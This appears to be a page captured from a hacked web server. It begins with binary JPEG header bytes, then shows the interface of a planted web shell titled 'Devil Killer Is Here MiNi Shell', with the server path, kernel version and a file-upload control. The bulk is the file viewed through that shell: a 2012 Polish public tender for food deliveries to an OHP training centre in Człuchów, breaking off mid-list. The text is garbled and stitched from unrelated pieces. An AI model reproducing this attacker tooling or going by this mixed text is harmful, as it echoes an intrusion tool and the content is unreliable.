JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121109/441620-N-2012.html

<p class="kh_header"><b>Gdańsk: Bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Człuchowie w 2013 r.</b><br>
<b>Numer ogłoszenia: 441620 - 2012; data zamieszczenia: 09.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnicze Hufce Pracy - Pomorska Wojewódzka Komenda , ul. J. Uphagena 27, 80-237 Gdańsk, woj. pomorskie, tel. 58 3017916, faks 58 3017916.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pomorska.ohp.pl/  http://www.pomorskie.eu/pl/bip/ohp</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja rynku pracy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Człuchowie w 2013 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest sukcesywna bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Człuchowie od 1 stycznia 2013 r.  do dnia 31 grudnia 2013 roku do: Ośrodka Szkolenia i Wychowania w Człuchowie, ul. Kusocińskiego 4. 
2.	Przedmiot zamówienia podzielono na siedemnaście zadań częściowych:
Zadanie	1. owoce świeże
Zadanie	2. owoce przetworzone
Zadanie	3. warzywa świeże
Zadanie	4. warzywa przetworzone 
Zadanie	5. mrożonki
Zadanie	6. jaja
Zadanie	7. mięso i produkty mięsne
Zadanie	8. drób
Zadanie	9. wędliny i produkty wędliniarskie
Zadanie	10. pasztety i konserwy
Zadanie	11. ryby i przetwory
Zadanie	12. pieczywo i ciasto
Zadanie	13. produkty skrobi 
Zadanie	14 produkty spożywcze różne
Zadanie	15 oleje i tłuszcze roślinne
Zadanie	16 produkty mleczarskie
Zadanie	17 napoje
3.	Dostawa będzie realizowana cyklicznie transportem Wykonawcy i na jego koszt do Ośrodka Szkolenia i Wychowania w Człuchowie, ul. Kusocińskiego 4 (dokładne miejsce na terenie OSiW Człuchów wskazane będzie przez Zamawiającego po podpisaniu umowy).
4.	Dostawca realizuje dostawy na własny koszt, transportem przystosowanym do tego celu i spełniającym niezbędne wymagania określone przepisami prawa obowiązującymi w tym zakresie. 
5.	Każdy z artykułów powinien być dostarczony w wymaganych opakowaniach. Cykliczne dostawy  będą realizowane od poniedziałku do niedzieli w godzinach od  5.00 do   14.00. najpóźniej na drugi dzień od złożenia zapotrzebowania. Każdorazowa dostawa odbywa się na podstawie wcześniejszego zapotrzebowania określającego dokładną godzinę dostarczenia, datę dostarczenia, ilość, rodzaj artykułów, złożonego nawet w dniu poprzedzającym dostawę (pisemnie, faksem lub telefonicznie). 
6.	Cykliczne dostawy  będą realizowane jak następuje:  
7.	Zamawiający powiadomi telefonicznie Wykonawcę, o każdej dostawie oraz wskaże zamawiane artykuły z podaniem ilości.
8.	Artykuły muszą spełniać normy jakościowe oraz muszą być dostarczone w ich początkowym okresie gwarancji.
9.	Wykonawca powinien zachować odpowiednie warunki  transportu i przechowywania dostarczanego towaru. Każda dostawa artykułów wymagającego załączenia handlowego dokumentu identyfikacyjnego musi posiadać taki dokument. 
10.	Wykonawca użyczy nieodpłatnie ewentualnie potrzebnych pojemników przy każdorazowej dostawie artykułów do siedziby Zamawiającego na okres do następnej dostawy.
11.	Zamawiający zastrzega sobie prawo zamawiania mniejszej ilości towaru niż określona w ofercie.
12.	Wykonawcy nie przysługują wobec Zamawiającego roszczenia odszkodowawcze z tytułu zmniejszenia zamówienia. Wykonawcy będzie przysługiwało jedynie wynagrodzenie za zrealizowane dostawy bez naliczania kar umownych w razie zmniejszenia ilości dostaw.
13.	W trakcie realizacji zamówienia Zamawiający zastrzega sobie możliwość zamiany proporcji ilościowych poszczególnego asortymentu w stosunku do podanego w formularzu ofertowym. 
14.	Wykonawca ma obowiązek uznania reklamacji jakości i ilości dostarczanych artykułów i      dostarczenia nowej partii artykułów do siedziby  Zamawiającego  w dniu złożenia reklamacji.
15.	Do składania zamówień Zamawiający upoważni wybranego pracownika.
16.	Każda dostawa winna być ubezpieczona przez Wykonawcę na jego koszt w zakresie odpowiedzialności cywilnej.
17.	W przypadku niedostarczenia towaru w wyznaczonym terminie i czasie lub dostarczenia towaru niezgodnie ze złożonym zapotrzebowaniem, Zamawiający zastrzega sobie prawo do zakupu niedostarczonego towaru, a kosztami zakupu (fakturą Vat) obciąży Wykonawcę. Zamawiający powiadomi o tym fakcie Wykonawcę telefonicznie i na piśmie.
18.	Jeżeli w opisie przedmiotu zamówienia znajduje się jakikolwiek znak towarowy, patent czy pochodzenie - należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ i dopuszcza składanie rozwiązań równoważnych o parametrach techniczno eksploatacyjno użytkowych nie gorszych niż te, podane pod pojęciem typu. 
19.	Wykonawca na żądanie zamawiającego ma obowiązek wystawiać faktury oddzielne na każde zadanie w ramach zamówienia cząstkowego.  
20.	Zamawiający zastrzega sobie możliwość  zastosowania prawa opcji, tj. możliwość zmniejszenia ilości poszczególnych rodzajów artykułów żywnościowych w stosunku do podanych w formularzu cenowym. Maksymalny zakres przedmiotu zamówienia może zostać pomniejszony o nie więcej niż 70 % ogólnej wartości tzn. zostanie zrealizowany w co najmniej 30 % wartości zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.33.24.00-8, 15.30.00.00-1, 15.89.80.00-9, 15.43.00.00-1, 03.21.00.00-6, 15.41.00.00-5, 15.13.10.00-5, 15.33.11.70-9, 03.22.00.00-9, 15.33.24.10-1, 15.22.00.00-6, 15.86.00.00-0, 03.14.25.00-3, 15.30.00.00-1, 15.00.00.00-0, 15.80.00.00-6, 15.13.11.10-9, 15.13.11.30-5, 15.10.00.00-9, 15.11.90.00-5, 15.90.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 17.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od żądania wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 12.2.1.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 12.2.1.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 12.2.1.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 12.2.1.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 12.2.1.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia.

1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia - art. 23 ust. 1 ustawy Pzp.                   W takim przypadku Wykonawcy ponoszą solidarną odpowiedzialność za wykonanie umowy.
2.	Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich                   w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego i dlatego też zobowiązane są dołączyć do oferty - pełnomocnictwo do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia, albo pełnomocnictwo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna dokładnie określać zakres umocowania.
3.	Wykonawcy, o których mowa w punkcie 1 składają jedną ofertę, przy czym:
A.	Załącznik nr 3 do SIWZ (Oświadczenie Wykonawcy o braku podstaw do wykluczenia) każdy z Wykonawców składa oddzielnie w formie oryginału i podpisuje we własnym imieniu. Dopuszcza się możliwość złożenia na jednym formularzu, w którym będą znajdować się podpisy umocowanych osób wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
B.	Załącznik nr 2 (Oświadczenie Wykonawcy o spełnianiu warunków udziału w  postępowaniu) Wykonawcy składają w formie oryginału i mogą złożyć wspólnie na jednym dokumencie (oświadczenie podpisane przez Pełnomocnika lub przez każdego z Wykonawców odrębnie), lub każdy z nich na osobnym dokumencie.
UWAGA: Do podmiotów wspólnie ubiegających się o zamówienie publiczne stosuje się te same przepisy co do pojedynczego wykonawcy. Odpowiednie ich stosowanie oznacza, że każdy uczestnik wspólnej oferty musi posiadać uprawnienia do wykonywania określonej działalności lub czynności i nie może podlegać wykluczeniu z postępowania. Natomiast przy ocenie spełniania warunków, brany jest pod uwagę łączny potencjał techniczny i kadrowy wykonawców (członków konsorcjum, członków spółki cywilnej) ich łączne kwalifikacje i doświadczenie oraz łączną sytuację ekonomiczną i finansową.
Formularz oferty, formularz cenowy oraz pozostałe oświadczenia i dokumenty (za wyjątkiem sytuacji opisanych w pkt. 12.5), muszą być podpisane (czytelnie lub nieczytelnie wraz z pieczątką imienną) przez osobę uprawnioną do występowania w imieniu Wykonawcy, tj. przez osobę uprawnioną do składania oświadczeń woli i zaciągania zobowiązań, wskazaną w dokumencie upoważniającym do występowania w obrocie prawnym. W przypadku złożenia oferty, bądź też dokonania innych czynności przez osobę lub osoby nie uwidocznione w odpisie z KRS-u dla spółek prawa handlowego, bądź nie będącą właścicielem firmy w przypadku innej formy prawnej, należy dołączyć prawnie skuteczne pełnomocnictwo lub upoważnienie osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio z załączonych dokumentów.
2.	Oświadczenie Wykonawcy, o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 uPzp załącznik nr 3.
3.	Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 uPzp załącznik nr 2.
4.	Zobowiązania innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów z zakresu wiedzy i doświadczenia, na okres korzystania z nich przy wykonywaniu zamówienia, zgodnie z zapisem w rozdziale 12.2 pkt 3  - o ile dotyczy.
5.	W przypadku Wykonawców występujących wspólnie (konsorcjum), oprócz w/w dokumentów należy dołączyć:
A.	Pełnomocnictwo lidera - pełnomocnika do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o zamówienie, a w szczególności do złożenia oferty lub do złożenia oferty i podpisania umów w imieniu konsorcjum. Fakt ustanowienia pełnomocnika musi wynikać z załączonych do oferty dokumentów (np. pełnomocnictwa). Wypełniając formularz ofertowy, jak również inne dokumenty powołujące się na Wykonawcę, w miejscu nazwa i adres Wykonawcy należy wpisać oprócz danych pełnomocnika konsorcjum, również dane dotyczące wszystkich członków konsorcjum - wszystkich Wykonawców składających ofertę wspólną. Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem wymienionym w pełnomocnictwie występującym jako reprezentant pozostałych konsorcjantów.
B.	Oświadczenie wszystkich członków konsorcjum o ich odpowiedzialności solidarnej za zobowiązania.
6.	Dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji wykonawcy, a jeżeli wykonawcę reprezentuje pełnomocnik także pełnomocnictwo określające zakres umocowania podpisane przez osoby uprawnione do reprezentowania wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>19.	Zamawiający dopuszcza zmianę postanowień zawartej umowy w zakresie:
A.	Zmian organizacyjnych stron np. zmiana reprezentacji lub siedziby firmy. 
B.	Zmian osób wyznaczonych do uzgodnień i koordynacji przedmiotu niniejszej  umowy. 
C.	W przypadku zmian unormowań prawnych powszechnie obowiązujących np. zmiana urzędowej stawki podatku VAT. W przypadku zmiany obowiązującej stawki podatku VAT, Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT. Strony dokonają odpowiedniej zmiany wynagrodzenia w przypadku realizacji tej części zamówienia, której w dniu zmiany stawki podatku VAT jeszcze nie dokonano.
D.	W innych sytuacjach, których nie można było przewidzieć w chwili zawarcia niniejszej umowy i mających charakter zmian nieistotnych tzn. takich, o których wiedza na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie lub na wynik postępowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pomorskie.eu/pl/bip/ohp<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia można uzyskać nieodpłatnie  w godz. od 8oo-15 oo  w siedzibie  Zamawiającego,  pokój nr 605, VI piętro - sekretariat ogólny.
ul.Uphaqena 27, 80-237 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.11.2012 godzina 11:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego, ul. J. Uphagena 27, 80-237 Gdańsk
 (sekretariat) 6 piętro, pokój 605:.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie	1. owoce świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> arbuz	kg	149
banany	kg	150
brzoskwinie	kg	50
cytryny	kg	20
czereśnie	kg	5
gruszki	kg	30
jabłka	kg	250
kiwi	kg	10
kiwi	szt	90
nektaryny	kg	43
mandarynki	kg	50
pomarancza	kg	30
pomarańcza siatka	kg	30
śliwki	kg	14
truskawki	kg	20
wisnie	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie	2. owoce przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas konserwowany450g	szt	55
brzoskwinie kons.0.9	szt	30
Dżem 7 kg	szt	10
Dżem  270 g	szt	120
kompot agrestowy 0,9l	szt	26
kompot wiśniowy 0,9 l	szt	26
owoce do ciasta 3 kg(puszka)	szt	2
sok owocowy 2l ( różne smaki - pomarańczowy, grejfrut, jabułko, cz. Pożeczka, mix itp..	szt	30
		
sok owocowy 1l( różne smaki- pomarań, gruszka, wiśnia, grejfrut, mix.itp.)	szt	40
		
sok  typu owocowo, warzywon- owocowe( marchew-trusk-banan,marchew-malina-banan, marchew-banan, itp..) 220ml	szt	215
		
		
syrop owocowy 0,5l	l	120
syrop owocowy 6,5l	l	13
syrop owocowy 1l	l	6
rodzynki suszone 100g	szt	10
rodzynki suszone 0.5 kg	szt	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie	3. warzywa świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> burak młody	kg	25
burak	kg	350
brokuł	szt	10
cebula	kg	450
cebula młoda	kg	50
cebula czerwona	kg	5
czosnek	szt	30
czosnek	kg	5
fasola jaś 0,4kg	szt	14
fasola drobna 5kg	kg	15
fasola drobna 0,4 kg	szt	12
fasola jaś	kg	35
fasola szparagowa	kg	20
groch cały 400g	kg	10
groch łuska 0,4kg	szt	36
groch łuskany 5kg	kg	20
kabaczek	kg	25
kapusta czerwona	kg	60
kapusta młoda	szt	70
kapusta	kg	650
kapusta pekińska	kg	150
kapusta pekińska	szt	40
kapusta włoska	kg	20
kalafior	szt	15
koper	szt	100
koper duży	szt	10
marchew młoda	kg	100
marchew myta	kg	450
ogórek gruntowy	kg	20
ogórek świeży	kg	120
papryka świeża	kg	20
pietruszka korzeń	kg	250
pomidor	kg	250
por	szt	30
por	kg	110
rzodkiewka pęczki	szt	100
sałata	szt	20
sałata dekoracyjna	szt	15
seler	kg	210
seler naciowa	szt	5
szczypiorek	szt	60
zielenina natka	szt	450
ziemniaki młode	kg	1500
ziemniaki	kg	4000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie	4. warzywa przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chrzan tarty 160g	szt	36
cebulka konserwowa 300g	szt	5
fasolka czerwona konserw.	szt	10
groszek konserwowy 400g	szt	40
groszek z marchewką 0,9l	szt	16
kapusta kiszona  5kg	szt	36
koncentrat pomidorowy 0,9l	szt	40
koncentrat pomidorowy 1l	szt	10
kukurydza konserwowa	szt	36
kukurydza kons. 0,9 l	szt	18
oliwki 200ml	szt	3
ogórki kiszone 3kg	kg	90
ogórki małosolne	kg	16
ogórki konserwowe 0,9l	szt	56
papryka konserwowa 0,9l	szt	24
pieczarka	kg	18
pieczarka konserwowa 0,9l	szt	30
pieczarka solona 0.9	szt	24
pieczarka solona 3000ml	szt	3
szczaw konserwowy 0,9l	szt	36.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie	5. mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brukselka mroż 0.5 kg	szt	10
brukselka mroż. 2,5 kg	kg	10
brokuły mroż. 2,5 kg	kg	10
frytki  1kg	szt	18
Frytki 1,5 kg	kg	6
Frytki 2 kg	kg	8
groszek mrozony	kg	15
groszek mrozony 2,5 kg	kg	10
hamburger mrozony	szt	150
kalafior mroz 2,5 kg	szt	2
kalafior mroż	kg	25
marchew mini 2,5 kg	szt	2
